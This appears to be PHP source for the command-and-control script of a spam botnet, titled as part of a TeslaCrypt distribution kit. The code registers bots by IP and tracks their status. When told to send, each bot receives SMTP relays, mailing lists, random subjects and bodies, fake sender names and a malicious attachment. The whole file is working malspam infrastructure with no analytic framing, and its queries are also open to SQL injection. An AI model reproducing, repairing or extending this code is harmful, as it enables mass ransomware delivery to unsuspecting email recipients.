TeslaCrypt | bombila spammer cmd.php

<?php

#############################
#            SPAMER - SPB #
#############################

error_reporting(0);

require_once 'system/core.php';


 if (isset($_POST['status']))
{


   $status = int($_POST['status']);
   $ip_bot = $_SERVER['REMOTE_ADDR'];


   $sql_b = mysql_query("SELECT * FROM `bots` WHERE `ip`='$ip_bot' LIMIT 1");

        if (mysql_num_rows($sql_b) == 0)
        {


                mysql_unbuffered_query("INSERT INTO `bots` (`ip`, `time`) VALUES ('$ip_bot', '".time()."')");

        }
        else
        {
 $out_b = mysql_fetch_array($sql_b);
mysql_unbuffered_query("UPDATE `bots` SET `status`='$status', `time`='".time()."' WHERE `id`='".$out_b['id']."' LIMIT 1");
        }
}
else
{
        $ip_bot = $_SERVER['REMOTE_ADDR'];
        $sql_b = mysql_query("SELECT * FROM `bots` WHERE `ip`='$ip_bot' LIMIT 1");

        if (mysql_num_rows($sql_b) > 0)
        {
                $out_b = mysql_fetch_array($sql_b);
                $status = $set['status'];
                mysql_unbuffered_query("UPDATE `bots` SET `status`='$status', `time`='".time()."' WHERE `id`='".$out_b['id']."' LIMIT 1");


                          if ($status == 3)
                {

                    $out_m = mysql_fetch_array(mysql_query("SELECT * FROM `mail`"));

                    $out_mess = mysql_fetch_array(mysql_query("SELECT * FROM `messages` ORDER BY RAND() LIMIT 1"));  /* Отдача рандомом писем */

                     $out_t = mysql_fetch_array(mysql_query("SELECT * FROM `themes` ORDER BY RAND() LIMIT 1"));  /* Отдача рандомом темы*/

                    #$out_s = mysql_fetch_array(mysql_query("SELECT * FROM `smtp` ORDER BY RAND() LIMIT 1"));  /* Отдача рандомом темы*/


                        ##########################################################


                $kolps = $out_m['kolps'];

                #$smtp .= $out_s['domen']."\t";

                $thema = $out_t['thema'];

                $message = $out_mess['message'];

                $x_mailer = $out_m['x_mailer'];    /* x_mailer */

                $from = $out_m['from'];    /* имя аттача */

                $reply = $out_m['reply'];    /* имя аттача */

 $row_count = mysql_result(mysql_query('SELECT COUNT(*) FROM smtp;'), 0);
$query = array();
while (count($query) < 5) {
    $query[] = '(SELECT * FROM smtp LIMIT '.rand(0, $row_count).', 1)';
}
$query = implode(' UNION ', $query);
$res = mysql_query($query);


                    while ($out = mysql_fetch_array($res))
                              {
                                 $smtp .= $out['domen']."\t";

                               }

###################################################################################


################################################################

                           $scan = scandir('attach');

                        if (file_exists('attach/'.$scan[2]))
                        {

                        $out_sh = mysql_fetch_array(mysql_query("SELECT * FROM `mail`")); /* Для макроса аттача */

                    copy('attach/'.$scan[2], 'go_attach/'.$scan[2]); /* Рандом аттача*/


                                 unlink('attach/'.$scan[2]);


                           $scanm = scandir('mails');

                        if (file_exists('mails/'.$scanm[2]))
                        {
                                copy('mails/'.$scanm[2], 'go_mails/botid-'.$out_b['id'].'_'.$scanm[2]);
                                  unlink('mails/'.$scanm[2]);


                          $out_sh = mysql_fetch_array(mysql_query("SELECT * FROM `mail`"));
                          $ran_mac = $out_sh['html'];
                          $rf = $out_sh['mot'];


if ($ran_mac == 0){

$out_n = mysql_fetch_array(mysql_query("SELECT * FROM `name` ORDER BY RAND() LIMIT 1000"));
$out_f = mysql_fetch_array(mysql_query("SELECT * FROM `famyli` ORDER BY RAND() LIMIT 1000"));


    $file = fopen("header/name.txt", 'a+');
    fwrite($file, $out_n['name']."\t".$out_f['famyli']."\n");
    fclose($file);


$attach = scandir('go_attach');

  if (file_exists('go_attach/'.$attach[2]))
                        {

           echo "3\n".$out_sh['sh']."\n".iconv("UTF-8", "UTF-8", $smtp)."\n".PATH."go_mails/botid-".$out_b['id']."_".$scanm[2]."\n".PATH."header/".$name."\n".PATH."go_attach/".$attach[2]."\n".iconv("UTF-8", "UTF-8", $from)."\n".iconv("UTF-8", "UTF-8", $x_mailer)."\n".iconv("UTF-8", "UTF-8", $reply)."\n".iconv("UTF-8", "UTF-8", $kolps)."\n".iconv("UTF-8", "UTF-8", $thema)."\n".iconv("UTF-8", "UTF-8", $message);
 }
}

if ($ran_mac == 1){

/*$out_n = mysql_fetch_array(mysql_query("SELECT * FROM `name` ORDER BY RAND() LIMIT 1000"));
$out_f = mysql_fetch_array(mysql_query("SELECT * FROM `famyli` ORDER BY RAND() LIMIT 1000"));


    $file = fopen("header/name.txt", 'a+');
    fwrite($file, $out_n['name']."\t".$out_f['famyli']."\n");
    fclose($file);
*/

$attach = scandir('go_attach');

  if (file_exists('go_attach/'.$attach[2]))
                        {

           echo "3\n".$out_sh['sh']."\n".iconv("UTF-8", "UTF-8", $smtp)."\n".PATH."go_mails/botid-".$out_b['id']."_".$scanm[2]."\n".PATH."header/".$name."\n".PATH."go_attach/".$attach[2]."\n[ID:".mt_rand(0,9999999)."-".mt_rand(0,9999)."]".$rf."\n".iconv("UTF-8", "UTF-8", $x_mailer)."\n".iconv("UTF-8", "UTF-8", $reply)."\n".iconv("UTF-8", "UTF-8", $kolps)."\n".iconv("UTF-8", "UTF-8", $thema)."\n".iconv("UTF-8", "UTF-8", $message);
              }
             }
          }
        }
      }
   }
 }
mysql_unbuffered_query("UPDATE `bots` SET `life`=0 WHERE `time`<'".(time()-1200)."'");
?>